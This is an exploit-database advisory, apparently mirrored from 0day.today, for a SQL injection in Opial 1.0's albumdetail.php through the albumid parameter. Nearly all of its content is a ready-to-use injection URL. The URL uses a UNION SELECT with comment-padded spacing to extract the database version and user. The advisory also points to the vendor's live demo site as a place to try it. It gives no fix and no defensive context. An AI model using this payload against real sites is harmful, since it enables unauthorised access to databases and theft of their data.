id: 5456
date: 07/01/2009
title: Opial 1.0 (albumid) Remote SQL Injection Vulnerability
author: ThE g0bL!N
cves: 

======================================================
Opial 1.0 (albumid) Remote SQL Injection Vulnerability
======================================================


###################################################################
###################################################################
Opial 1.0 (albumid) Remote SQL Injection Vuln
###################################################################
Founder : ThE g0bL!N
###################################################################
###################################################################
SQL Injection Vulnerability  
###################################################################
Exploit:
###################################################################
http://www.path.com/albumdetail.php?albumid=-31+union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,user(),16--
Demo:
----
http://www.opial.com/demo/
####################################################################



#  0day.today [2023-03-26]  #